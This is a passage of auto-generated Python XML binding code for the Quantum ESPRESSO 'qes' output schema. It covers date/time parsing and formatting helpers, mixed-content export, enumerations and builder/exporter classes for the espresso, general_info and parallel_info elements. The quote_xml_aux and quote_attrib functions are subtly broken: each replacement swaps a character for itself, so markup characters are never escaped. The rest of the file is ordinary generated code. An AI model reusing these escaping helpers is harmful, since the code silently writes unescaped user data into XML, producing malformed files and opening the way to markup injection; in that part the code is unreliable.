tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (
time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(
hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns.
# The target value must match at least one of the patterns
# in order for the test to succeed.
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
mo = re_.search(patterns2, target)
if mo is not None and len(mo.group(0)) == len(target):
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2:
if ExternalEncoding:
encoding = ExternalEncoding
else:
encoding = 'utf-8'
return instring.encode(encoding)
else:
return instring
@staticmethod
def convert_unicode(instring):
if isinstance(instring, str):
result = quote_xml(instring)
elif sys.version_info.major == 2 and isinstance(instring, unicode):
result = quote_xml(instring).encode('utf8')
else:
result = GeneratedsSuper.gds_encode(str(instring))
return result
def __eq__(self, other):
if type(self) != type(other):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def getSubclassFromModule_(module, class_):
'''Get the subclass of a class from a specific module.'''
name = class_.__name__ + 'Sub'
if hasattr(module, name):
return getattr(module, name)
else:
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = ''
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
# Change this to redirect the generated superclass module to use a
# specific subclass module.
CurrentSubclassModule_ = None
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
"Escape markup chars, but do not modify CDATA sections."
if not inStr:
return ''
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s2 = ''
pos = 0
matchobjects = CDATA_pattern_.finditer(s1)
for mo in matchobjects:
s3 = s1[pos:mo.start()]
s2 += quote_xml_aux(s3)
s2 += s1[mo.start():mo.end()]
pos = mo.end()
s3 = s1[pos:]
s2 += quote_xml_aux(s3)
return s2
def quote_xml_aux(inStr):
s1 = inStr.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class HubbardProjType(object):
ATOMIC='atomic'
ORTHOATOMIC='ortho-atomic'
NORMATOMIC='norm-atomic'
PSEUDO='pseudo'
FILE='file'
class calculationType(object):
SCF='scf'
NSCF='nscf'
BANDS='bands'
RELAX='relax'
VCRELAX='vc-relax'
MD='md'
VCMD='vc-md'
class constr_typeType(object):
TYPE_COORD='type_coord'
ATOM_COORD='atom_coord'
DISTANCE='distance'
PLANAR_ANGLE='planar_angle'
TORSIONAL_ANGLE='torsional_angle'
BENNET_PROJ='bennet_proj'
class controlRestartModeType(object):
FROM_SCRATCH='from_scratch'
RESTART='restart'
class diagoType(object):
DAVIDSON='davidson'
CG='cg'
class electric_potentialType(object):
SAWTOOTH_POTENTIAL='sawtooth_potential'
HOMOGENOUS_FIELD='homogenous_field'
BERRY__PHASE='Berry_Phase'
NONE='none'
class functionalType(object):
PZ='PZ'
BP='BP'
PBE='PBE'
REVPBE='REVPBE'
PBESOL='PBESOL'
BLYP='BLYP'
OLYP='OLYP'
PW_91='PW91'
WC='WC'
SOGGA='SOGGA'
EV_93='EV93'
B_3_LYP='B3LYP'
GAU_PBE='GauPBE'
PBE_0='PBE0'
HSE='HSE'
VDWDF='VDW-DF'
VDWDFCX='VDW-DF-CX'
VDWDFC_09='VDW-DF-C09'
VDWDFOB_86='VDW-DF-OB86'
VDWDFOBK_8='VDW-DF-OBK8'
VDWDF_2='VDW-DF2'
VDWDF_2C_09='VDW-DF2-C09'
VDWDF_2B_86_R='VDW-DF2-B86R'
RVV_10='RVV10'
class lowhighType(object):
LOW='low'
HIGH='high'
class mixingModeType(object):
PLAIN='plain'
TF='TF'
LOCALTF='local-TF'
class smearingChoiceType(object):
GAUSSIAN='gaussian'
MP='mp'
MV='mv'
FD='fd'
class statusType(object):
_0='0'
_1='1'
_2='2'
_3='3'
_2_55='255'
class espressoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Units=None, general_info=None, parallel_info=None, input=None, step=None, output=None, status=None, cputime=None, closed=None):
self.original_tagname_ = None
self.Units = _cast(None, Units)
self.general_info = general_info
self.parallel_info = parallel_info
self.input = input
if step is None:
self.step = []
else:
self.step = step
self.output = output
self.status = status
self.validate_statusType(self.status)
self.cputime = cputime
self.closed = closed
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, espressoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if espressoType.subclass:
return espressoType.subclass(*args_, **kwargs_)
else:
return espressoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_general_info(self): return self.general_info
def set_general_info(self, general_info): self.general_info = general_info
def get_parallel_info(self): return self.parallel_info
def set_parallel_info(self, parallel_info): self.parallel_info = parallel_info
def get_input(self): return self.input
def set_input(self, input): self.input = input
def get_step(self): return self.step
def set_step(self, step): self.step = step
def add_step(self, value): self.step.append(value)
def insert_step_at(self, index, value): self.step.insert(index, value)
def replace_step_at(self, index, value): self.step[index] = value
def get_output(self): return self.output
def set_output(self, output): self.output = output
def get_status(self): return self.status
def set_status(self, status): self.status = status
def get_cputime(self): return self.cputime
def set_cputime(self, cputime): self.cputime = cputime
def get_closed(self): return self.closed
def set_closed(self, closed): self.closed = closed
def get_Units(self): return self.Units
def set_Units(self, Units): self.Units = Units
def validate_statusType(self, value):
# Validate type statusType, a restriction on integer.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['0', '1', '2', '3', '255']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on statusType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.general_info is not None or
self.parallel_info is not None or
self.input is not None or
self.step or
self.output is not None or
self.status is not None or
self.cputime is not None or
self.closed is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='espressoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('espressoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='espressoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='espressoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='espressoType'):
if self.Units is not None and 'Units' not in already_processed:
already_processed.add('Units')
outfile.write(' Units=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Units), input_name='Units')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='espressoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.general_info is not None:
self.general_info.export(outfile, level, namespaceprefix_, name_='general_info', pretty_print=pretty_print)
if self.parallel_info is not None:
self.parallel_info.export(outfile, level, namespaceprefix_, name_='parallel_info', pretty_print=pretty_print)
if self.input is not None:
self.input.export(outfile, level, namespaceprefix_, name_='input', pretty_print=pretty_print)
for step_ in self.step:
step_.export(outfile, level, namespaceprefix_, name_='step', pretty_print=pretty_print)
if self.output is not None:
self.output.export(outfile, level, namespaceprefix_, name_='output', pretty_print=pretty_print)
if self.status is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:status>%s</qes:status>%s' % (self.gds_format_integer(self.status, input_name='status'), eol_))
if self.cputime is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:cputime>%s</qes:cputime>%s' % (self.gds_format_integer(self.cputime, input_name='cputime'), eol_))
if self.closed is not None:
self.closed.export(outfile, level, namespaceprefix_, name_='closed', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Units', node)
if value is not None and 'Units' not in already_processed:
already_processed.add('Units')
self.Units = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'general_info':
obj_ = general_infoType.factory()
obj_.build(child_)
self.general_info = obj_
obj_.original_tagname_ = 'general_info'
elif nodeName_ == 'parallel_info':
obj_ = parallel_infoType.factory()
obj_.build(child_)
self.parallel_info = obj_
obj_.original_tagname_ = 'parallel_info'
elif nodeName_ == 'input':
obj_ = inputType.factory()
obj_.build(child_)
self.input = obj_
obj_.original_tagname_ = 'input'
elif nodeName_ == 'step':
obj_ = stepType.factory()
obj_.build(child_)
self.step.append(obj_)
obj_.original_tagname_ = 'step'
elif nodeName_ == 'output':
obj_ = outputType.factory()
obj_.build(child_)
self.output = obj_
obj_.original_tagname_ = 'output'
elif nodeName_ == 'status' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'status')
self.status = ival_
# validate type statusType
self.validate_statusType(self.status)
elif nodeName_ == 'cputime' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ < 0:
raise_parse_error(child_, 'requires nonNegativeInteger')
ival_ = self.gds_validate_integer(ival_, node, 'cputime')
self.cputime = ival_
elif nodeName_ == 'closed':
obj_ = closedType.factory()
obj_.build(child_)
self.closed = obj_
obj_.original_tagname_ = 'closed'
# end class espressoType
class general_infoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, xml_format=None, creator=None, created=None, job=None):
self.original_tagname_ = None
self.xml_format = xml_format
self.creator = creator
self.created = created
self.job = job
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, general_infoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if general_infoType.subclass:
return general_infoType.subclass(*args_, **kwargs_)
else:
return general_infoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_xml_format(self): return self.xml_format
def set_xml_format(self, xml_format): self.xml_format = xml_format
def get_creator(self): return self.creator
def set_creator(self, creator): self.creator = creator
def get_created(self): return self.created
def set_created(self, created): self.created = created
def get_job(self): return self.job
def set_job(self, job): self.job = job
def hasContent_(self):
if (
self.xml_format is not None or
self.creator is not None or
self.created is not None or
self.job is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='general_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('general_infoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='general_infoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='general_infoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='general_infoType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='general_infoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.xml_format is not None:
self.xml_format.export(outfile, level, namespaceprefix_, name_='xml_format', pretty_print=pretty_print)
if self.creator is not None:
self.creator.export(outfile, level, namespaceprefix_, name_='creator', pretty_print=pretty_print)
if self.created is not None:
self.created.export(outfile, level, namespaceprefix_, name_='created', pretty_print=pretty_print)
if self.job is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:job>%s</qes:job>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.job), input_name='job')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'xml_format':
obj_ = xml_formatType.factory()
obj_.build(child_)
self.xml_format = obj_
obj_.original_tagname_ = 'xml_format'
elif nodeName_ == 'creator':
obj_ = creatorType.factory()
obj_.build(child_)
self.creator = obj_
obj_.original_tagname_ = 'creator'
elif nodeName_ == 'created':
obj_ = createdType.factory()
obj_.build(child_)
self.created = obj_
obj_.original_tagname_ = 'created'
elif nodeName_ == 'job':
job_ = child_.text
job_ = self.gds_validate_string(job_, node, 'job')
self.job = job_
# end class general_infoType
class parallel_infoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nprocs=None, nthreads=None, ntasks=None, nbgrp=None, npool=None, ndiag=None):
self.original_tagname_ = None
self.nprocs = nprocs
self.nthreads = nthreads
self.ntasks = ntasks
self.nbgrp = nbgrp
self.npool = npool
self.ndiag = ndiag
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, parallel_infoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if parallel_infoType.subclass:
return parallel_infoType.subclass(*args_, **kwargs_)
else:
return parallel_infoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nprocs(self): return self.nprocs
def set_nprocs(self, nprocs): self.nprocs = nprocs
def get_nthreads(self): return self.nthreads
def set_nthreads(self, nthreads): self.nthreads = nthreads
def get_ntasks(self): return self.ntasks
def set_ntasks(self, ntasks): self.ntasks = ntasks
def get_nbgrp(self): return self.nbgrp
def set_nbgrp(self, nbgrp): self.nbgrp = nbgrp
def get_npool(self): return self.npool
def set_npool(self, npool): self.npool = npool
def get_ndiag(self): return self.ndiag
def set_ndiag(self, ndiag): self.ndiag = ndiag
def hasContent_(self):
if (
self.nprocs is not None or
self.nthreads is not None or
self.ntasks is not None or
self.nbgrp is not None or
self.npool is not None or
self.ndiag is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='parallel_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('parallel_infoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='parallel_infoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='parallel_infoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='parallel_infoType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='parallel_infoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.nprocs is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nprocs>%s</qes:nprocs>%s' % (self.gds_format_integer(self.nprocs, input_name='nprocs'), eol_))
if self.nthreads is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nthreads>%s</qes:nthreads>%s' % (self.gds_format_integer(self.nthreads, input_name='nthreads'), eol_))
if self.ntasks is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ntasks>%s</qes:ntasks>%s' % (self.gds_format_integer(self.ntasks, input_name='ntasks'), eol_))
if self.nbgrp is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nbgrp>%s</qes:nbgrp>%s' % (self.gds_format_integer(self.nbgrp, input_name='nbgrp'), eol_))
if self.npool is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:npool>%s</qes:npool>%s' % (self.gds_format_integer(self.npool, input_name='npool'), eol_))
if self.ndiag is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ndiag>%s</qes:ndiag>%s' % (self.gds_format_integer(self.ndiag, input_name='ndiag'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'nprocs' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nprocs')
self.nprocs = ival_
elif nodeName_ == 'nthreads' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nthreads')
self.nthreads = ival_
elif nodeName_ == 'ntasks' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'ntasks')
self.ntasks = ival_
elif nodeName_ == 'nbgrp' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nbgrp')
self.nbgrp = ival_
elif nodeName_ == 'npool' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'npool')
self.npool = ival_
elif nodeName_ == 'ndiag' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'ndiag')
self.ndiag = ival_
# end class parallel_infoType
